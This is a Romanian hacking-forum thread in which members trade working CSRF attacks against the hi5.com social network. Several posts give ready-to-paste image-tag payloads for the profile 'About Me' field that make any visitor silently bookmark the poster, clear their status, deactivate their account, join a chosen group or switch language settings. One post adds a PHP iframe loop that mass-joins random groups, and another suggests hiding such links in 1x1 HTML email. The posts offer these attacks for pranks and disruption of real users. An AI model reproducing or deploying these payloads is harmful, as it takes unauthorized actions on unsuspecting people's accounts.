Jump to content
Guest Kenpachi

[RST] HI5.com - Vulnerabilitati CSRF [de actualitate]

Recommended Posts

La ala ce a facut siteul http://hi5-leaks.ws43.com/, am si eu o intrebare:Tu esti normal?ce draqu ai pus document.write ala?ca sa nu mai poata copia lumea :lol: ?MOTOARELE DE CAUTARE NU INDEXEAZA JAVASCRIPT, asa ca macar daca ai vrut sa faci ceva, fa naiba un inline calumea.

Share this post


Link to post
Share on other sites
la ce am nevoie de motoare de cautare ? nu am intentionat sa il pun pe google :-??

Nici sa nu il pui pe google... Ar fi dezastru daca ar incerca toti n00bii aceste vulnerabilitati :lol:

Share this post


Link to post
Share on other sites
la ce am nevoie de motoare de cautare ? nu am intentionat sa il pun pe google :-??

Nici sa nu il pui pe google... Ar fi dezastru daca ar incerca toti n00bii aceste vulnerabilitati :lol:

Lol, dar sunt deja pe google ... :lol: cel putin hackpedia. Doar siturile astea nu au intentia sa opreasca roboteii.

Share this post


Link to post
Share on other sites
Inca ceva daca le pun toate linkurile la About Me merg toate ?? sau doar un singur link pot pune ?

Daca citeai mai pe la inceputul topicului,realizai ca s-a mai discutat asta.Poti sa le pui toate deodata si vor functiona.

Share this post


Link to post
Share on other sites

dar linkul pt delete account ? :> iti dai seama ca e rupere ... haideti fratilor ca doar nu sunteti fani hi5 ... hai sa le rupem moda asta cu fitele lor ... au ajuns sa spuna "hai sa facem poze de hi5" geez :))

Share this post


Link to post
Share on other sites
dar linkul pt delete account ? :> iti dai seama ca e rupere ... haideti fratilor ca doar nu sunteti fani hi5 ... hai sa le rupem moda asta cu fitele lor ... au ajuns sa spuna "hai sa facem poze de hi5" geez :))

Un account nu merge sters definitiv.Chiar daca il stergi,dupa aceea poti sa il reactivezi :)

Share this post


Link to post
Share on other sites
dar linkul pt delete account ? :> iti dai seama ca e rupere ... haideti fratilor ca doar nu sunteti fani hi5 ... hai sa le rupem moda asta cu fitele lor ... au ajuns sa spuna "hai sa facem poze de hi5" geez :))

Un account nu merge sters definitiv.Chiar daca il stergi,dupa aceea poti sa il reactivezi :)

era prea frumos ca sa fie adevarat :oops:

Share this post


Link to post
Share on other sites

Daca tot romanu` ar stii comenzile alea ar fi haos :) The less you know the better , someone smart said :wink:

Share this post


Link to post
Share on other sites

Fratilor o idee e sa trimiti si html mail si pui linkul cu dimensiunea de 1x1 si nici nu se observa si numai sa deschida mailul si gata. eu unu am incercat si merge

Share this post


Link to post
Share on other sites

Inca 2 daca imi permite domnul Nemessis:

Cum sa faci ca cel care iti viziteaza profilul sa te adauge la favoriti.

Intra aici:

http://hi5.com/friend/profile/editBasic.do

La "About Me" scrieti urmatorul cod:

[img=http://hi5.com/friend/addBookmark.do?userid=1999999]

Unde 1999999 e idul meu pe care tu il schimbi cu al tau.

Cum sa faci sa i se stearga statusul celui care iti viziteaza profilul.

Intrati aici:

http://hi5.com/friend/profile/editBasic.do

La About Me scrieti urmatorul cod:

[img=http://hi5.com/friend/profile/deleteScrapbookTopic.do?clearTopic=true]

:)

Share this post


Link to post
Share on other sites

am ramas doar pe 2 mai subtile:

- profil vazut de toti!

- status=owned!

Si cont de fata ca sa am "succesuri".

PS ma tot viziteaza uratu ala de la vladinho, de unde draq imi gaseste toate conturile de fete pe care le deschid... pe toate imi da friend, am cosmare de la photo de chibrit cu privire de jbond

Share this post


Link to post
Share on other sites
Guest Nemessis
Inca 2 daca imi permite domnul Nemessis:

Cum sa faci ca cel care iti viziteaza profilul sa te adauge la favoriti.

Intra aici:

http://hi5.com/friend/profile/editBasic.do

La "About Me" scrieti urmatorul cod:

[img=http://hi5.com/friend/addBookmark.do?userid=1999999]

Unde 1999999 e idul meu pe care tu il schimbi cu al tau.

Cum sa faci sa i se stearga statusul celui care iti viziteaza profilul.

Intrati aici:

http://hi5.com/friend/profile/editBasic.do

La About Me scrieti urmatorul cod:

[img=http://hi5.com/friend/profile/deleteScrapbookTopic.do?clearTopic=true]

Bun. Le adaugam la lista.

Share this post


Link to post
Share on other sites

Inca unul:

Intrati aici:

http://hi5.com/friend/profile/editBasic.do

La "About Me" scrieti urmatorul cod:

[img=http://hi5.com/friend/account/displayRemoveAcct.do]

Cei care va vor vizita profilul isi vor sterge profilul,fara ca ei sa stie.Mai exact profilul va fi dezactivat,ownerul acestuia avand posibilitatea sa il reactiveze.Nu sunt sigur,dar cred ca functioneaza doar la cei pe care ii aveti in lista de prietenei de pe hi5.

Share this post


Link to post
Share on other sites
Inca unul:

Intrati aici:

http://hi5.com/friend/profile/editBasic.do

La "About Me" scrieti urmatorul cod:

[img=http://hi5.com/friend/account/displayRemoveAcct.do]

Cei care va vor vizita profilul isi vor sterge profilul,fara ca ei sa stie.Mai exact profilul va fi dezactivat,ownerul acestuia avand posibilitatea sa il reactiveze.Nu sunt sigur,dar cred ca functioneaza doar la cei pe care ii aveti in lista de prietenei de pe hi5.

Ai testat tu asta si stii sigur ca merge?

Eu zic ca trebuie sa confirmarea userului respectiv, adica trebuie sa isi bage emailul si parola.

Ma rog, poate ma insel, dar mi s-ar putea anormal sa mearga.

Share this post


Link to post
Share on other sites

Una frumoasa: Cum sa-ti faci un grup de ratati:

Creati un grup nou (eu am creat "ratati") in care scrieti tot ce aveti pe suflet (de ex Grup pentru toti care le plac sa o ia in gura in timp ce fac karaoke cu OOO viatamea, aveti imaginatie). Nu il setati ca Adult ca devine privat (nu am incercat, poate merge totusi)

Intrati apoi pe groups sa vedeti cum il cheama, va apare cu un link gen http://www.hi5.com/friend/group/3038263--ewq--front-html copiati numarul 3038263

Intra aici:

Cod:

http://hi5.com/friend/profile/editBasic.do

La "About Me" scrieti urmatorul cod:


[img=http://www.hi5.com/friend/group/joinGroup.do?accessCode=&invitorId=&contactId=&friendId=&groupId=3038263] height=0>

inlocuiti 3038263 cu grupul vostru

Toti vizitatorii vor intra direct in grupul creat de voi, desi un join group are protectie captcha :shock:

EDIT: Nemesis, daca updatezi, am mai adaugat eu una pe la inceputul threadului, am rescris-o mai citet:

Intra aici:

Cod:

http://hi5.com/friend/profile/editBasic.do

La "About Me" scrieti urmatorul cod:

[img=http://www.hi5.com/friend/displayHomePage.do?lang=uk_UA] 

Paginile pe care le va deschide userul vor fi afisate in chirilica (setari de ukraina). Alegeti o limba din lista de la punctul 3. In plus, desi userul isi schimba limba la loc, ii raman cateva setari pe tara respectiva.

--------------------

Ai testat tu asta si stii sigur ca merge?

Eu zic ca trebuie sa confirmarea userului respectiv, adica trebuie sa isi bage emailul si parola.

Ma rog, poate ma insel, dar mi s-ar putea anormal sa mearga.

Eu nu am testat, dar dupa cum vezi faza cu chapta in multe locuri nu iti cere confirmare. Accesscode este gol in link dar ignora.

Share this post


Link to post
Share on other sites

Loooalleeee!!! :lol:

Cum sa ai j-de mii de vizitatori (cu oleaca de rabdare): scrieti un .php si ii dati refresh cat vreti sau inlocuiti 20 cu ceva mai mare. Nu uitati sa fiti logati in Hi5.

<?

for($i=0;$i<20;$i++)

{ $group=rand(2000000, 3999999);

echo '<iframe src="http://www.hi5.com/friend/group/joinGroup.do?accessCode=&invitorId=&contactId=&friendId=&groupId='.$group.'"></iframe>';

}

?>

Ajustati numerele, programul te inscrie la 20 grupuri random. Chiar ca ma kk pe captcha de la hi5. Acum depinde de noroc sa va gaseasca random-ul ceva in intervalul de mai sus (mi-a gasit 2) dar bagati mai mult de 20 si dati refresh. Asa ca nu imi spuneti ca nu merge, grupurile sunt cam rare si greu de gasit.

Daca nu exista grupul va apare in iframe mesajul cu oops!

Odata inscris toti membrii grupurilor vor fi curiosi si vor intra pe profil la voi.

PS am inscris 4 grupuri si le-am sters. Deja am 2 Owned! in Ratati group :D

EDIT: Revin cu un crawler php de cautat "manele" sau ce vreti voi. Am dibuit search-ul. Ca metoda de revers: puneti mai tarziu un link "click here" spre crawler si il inscrieti pe vizitator la toate gunoaiele de grupuri de pe Hi5.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


×
×
  • Create New...